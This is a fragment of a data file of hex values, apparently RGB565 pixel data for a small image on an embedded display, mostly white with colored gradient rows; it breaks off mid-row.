0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xefff, 0x7d15, 0x9df9, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xef9d, 0x6bae, 0x7473, 0x3aee, 0x2312, 0x1b12, 0x1b33, 0x1b54, 0x1b74, 0x1b75, 0x2396, 0x23d7, 0x2bf7, 0x2c38, 0x3499, 0x3cda, 0x3cfa, 0x3cfa, 0x451a, 0x4d1a, 0x555b, 0x4d5b, 0x557b, 0x559c, 0x559c, 0x559c, 0x559c, 0x4d7b, 0x4d5a, 0x453a, 0x3cfa, 0x34d9, 0x34b9, 0x2c99, 0x2c78, 0x2458, 0x2439, 0x2438, 0x2c38, 0x2c38, 0x2c37, 0x3437, 0x2c37, 0x2c38, 0x3417, 0x3bd4, 0x3b0e, 0x3a4a, 0x8431, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xe7ff, 0x7d35, 0x9e18, 0xefff, 0xffff, 0xffff, 0xffdf, 0xf7df, 0xffff, 0xffff, 0xef7e, 0x634e, 0x7454, 0x3b10, 0x1355, 0x1355, 0x1376, 0x1397, 0x13b8, 0x13d8, 0x1c19, 0x243a, 0x247b, 0x249b, 0x24db, 0x2d1c, 0x2d3c, 0x355d, 0x3d7d, 0x459d, 0x45be, 0x45be, 0x45de, 0x4dde, 0x45de, 0x45de, 0x45de, 0x3dbd, 0x3d9d, 0x357d, 0x2d3c, 0x2d1c, 0x251c, 0x1cdc, 0x1cbc, 0x149b, 0x149c, 0x147c, 0x1c7b, 0x1c7b, 0x1c5a, 0x1c5a, 0x1c5a, 0x143a, 0x1c39, 0x2c17, 0x3310, 0x29e8, 0x8c71, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xefff, 0xdfff, 0x7514, 0x9618, 0xe7ff, 0xf7ff, 0xffff, 0xf7df, 0xf7ff, 0xffdf, 0xffff, 0xef3d, 0x634f, 0x7455, 0x32f1, 0x1335, 0x1355, 0x1376, 0x1396, 0x0bb7, 0x13d8, 0x1c19, 0x1c3a, 0x247a, 0x24db, 0x2cfb, 0x2d3c, 0x357c, 0x3d7d, 0x459d, 0x4dbd, 0x4ddd, 0x4ddd, 0x55dd, 0x55fe, 0x55fd, 0x4dfd, 0x4ddd, 0x4ddd, 0x45bd, 0x3d7d, 0x355c, 0x2d3c, 0x2d1c, 0x24fc, 0x1cdc, 0x1cbc, 0x1c7b, 0x1c7b, 0x1c7a, 0x1c5a, 0x1c5a, 0x1c59, 0x1439, 0x0c3a, 0x143a, 0x2417, 0x3310, 0x29c8, 0x8471, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0x7d15, 0xa63a, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xf75d, 0x634e, 0x6c34, 0x32f1, 0x1b33, 0x1b54, 0x1b75, 0x1395, 0x13b6, 0x1bd7, 0x2418, 0x2459, 0x2c9a, 0x34fa, 0x353b, 0x3d5b, 0x459b, 0x4dbc, 0x55dd, 0x55dd, 0x5dfc, 0x5dfc, 0x5dfd, 0x5dfd, 0x5dfd, 0x5dfd, 0x5dfc, 0x55fc, 0x4ddc, 0x4dbc, 0x457c, 0x3d5c, 0x353c, 0x2d1c, 0x2cfb, 0x24db, 0x24ba, 0x2499, 0x2479, 0x1c59, 0x1c38, 0x1c38, 0x1c18, 0x1419, 0x1419, 0x2bd6, 0x32ef, 0x29a7, 0x8451, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7bf, 0xefbe, 0xefff, 0x84f5, 0xadf9, 0xf7df, 0xf79e, 0xffde, 0xf7de, 0xf7df, 0xf7df, 0xffff, 0xef7c, 0x634d, 0x6412, 0x3310, 0x1b33, 0x1b54, 0x1b75, 0x1bb6, 0x1bd6, 0x1c18, 0x2459, 0x2c9a, 0x34da, 0x3d3b, 0x3d7b, 0x459b, 0x4ddc, 0x55fc, 0x5dfd, 0x661d, 0x663d, 0x663d, 0x663d, 0x663d, 0x663d, 0x663d, 0x5e1d, 0x5e1d, 0x5dfd, 0x55fd, 0x4dbd, 0x459d, 0x3d7d, 0x355d, 0x351c, 0x2cfc, 0x24fb, 0x24ba, 0x249a, 0x1c7a, 0x1c59, 0x2438, 0x1bf7, 0x1418, 0x13f8, 0x2bb5, 0x32ad, 0x2966, 0x8430, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xa555, 0x20e3, 0x2945, 0x31a7, 0x424a, 0x31e9, 0x2967, 0x2105, 0x5268, 0xf7de, 0xffff, 0xffff, 0xfffe, 0xef5b, 0x636c, 0x6411, 0x330f, 0x1354, 0x1374, 0x13b5, 0x1bd7, 0x1c18, 0x1c59, 0x2c9a, 0x34fb, 0x353b, 0x3d7c, 0x45bc, 0x4dfc, 0x561d, 0x5e3d, 0x663d, 0x663e, 0x6e5e, 0x6e5d, 0x6e5d, 0x6e5d, 0x665d, 0x665d, 0x665d, 0x665d, 0x5e3d, 0x561e, 0x4dfd, 0x45de, 0x3dbe, 0x3d9d, 0x357d, 0x2d3d, 0x251d, 0x24fc, 0x1cdc, 0x14bc, 0x1c7a, 0x1c38, 0x1bf7, 0x13f8, 0x13f8, 0x23b5, 0x2a8c, 0x2145, 0x8430, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x4a8b, 0x18c3, 0x3186, 0x4228, 0x424a, 0x3a2a, 0x3a0a, 0x2125, 0x10a1, 0xad75, 0xffff, 0xf7de, 0xfffe, 0xf77c, 0x5b2b, 0x6432, 0x2acf, 0x1354, 0x1395, 0x13d6, 0x1c17, 0x1c59, 0x249a, 0x2cfb, 0x3d3c, 0x3d9c, 0x45dd, 0x4e1d, 0x563d, 0x5e5e, 0x667e, 0x6e7e, 0x6e7e, 0x767d, 0x765d, 0x765d, 0x6e7d, 0x767d, 0x6e7d, 0x6e7d, 0x6e7d, 0x665d, 0x5e5d, 0x5e3d, 0x561d, 0x4dfd, 0x45dd, 0x3d9d, 0x357c, 0x2d1d, 0x24fd, 0x1cfd, 0x1cbd, 0x1c7b, 0x2459, 0x1bf7, 0x13f8, 0x13d8, 0x23b5, 0x2a8c, 0x1924, 0x7c2f, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffdf, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf79e, 0xffdf, 0xffff, 0xf7be, 0xf79e, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xbdf8, 0x2146, 0x2165, 0x31e7, 0x3a49, 0x3a6b, 0x3a8c, 0x29ea, 0x29c8, 0x1904, 0x4a69, 0xffff, 0xffff, 0xffff, 0xef5c, 0x5b0b, 0x5bb1, 0x3311, 0x1374, 0x1395, 0x1bf6, 0x1c38, 0x2479, 